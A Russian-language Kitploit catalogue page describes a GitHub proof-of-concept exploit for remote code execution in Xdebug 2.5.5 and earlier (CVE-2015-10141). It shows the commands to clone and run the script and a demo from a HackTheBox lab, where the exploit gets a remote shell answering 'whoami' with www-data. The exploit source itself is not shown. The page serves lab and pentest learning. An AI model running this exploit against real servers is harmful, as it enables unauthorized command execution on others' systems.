Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-CVE-2015-10141-Xdebug — Скрипт эксплойта для проверки концепции для Xdebug 2.5.5 и более ранних версий (CVE-2015-10141). | Kitploit
Инструменты/GitHubGitHub/n0m4d22/poc-cve-2015-10141-xdebug
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHubn0m4d22/poc-cve-2015-10141-xdebug

PoC-CVE-2015-10141-Xdebug

Скрипт эксплойта для проверки концепции для Xdebug 2.5.5 и более ранних версий (CVE-2015-10141).

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC-CVE-2015-10141

Пользовательский эксплойт на Python для Xdebug ≤ 2.5.5 (CVE-2015-10141).


Описание

Этот репозиторий содержит мой эксплойт Proof-of-Concept (PoC) для уязвимости удаленного выполнения кода Xdebug в версиях 2.5.5 и ранее.
Скрипт использует неаутентифицированный отладочный протокол, открытый на порту 9000, для достижения удаленного выполнения команд.

  • Уязвимость: CVE-2015-10141
  • Тип уязвимости: Remote Code Execution (RCE)
  • Затронутое ПО: Xdebug ≤ 2.5.5

Использование

root@kitploit:~
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py

При запросе введите целевой IP-адрес, на котором размещен Xdebug.

Демонстрация из моего недавнего разбора HackTheBox Olympus (Medium):

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data

Требования

  • Python 3.x
  • Цель, на которой запущен Xdebug ≤ 2.5.5 с включенной удаленной отладкой

Отказ от ответственности

Этот проект создан только в образовательных целях.

НЕ используйте этот эксплойт против систем без явного разрешения. Я не несу ответственности за любое неправомерное использование этого кода.


Ссылки

  • NVD – CVE-2015-10141
  • ExploitDB – 44568
  • Официальный сайт Xdebug
Скачать инструмент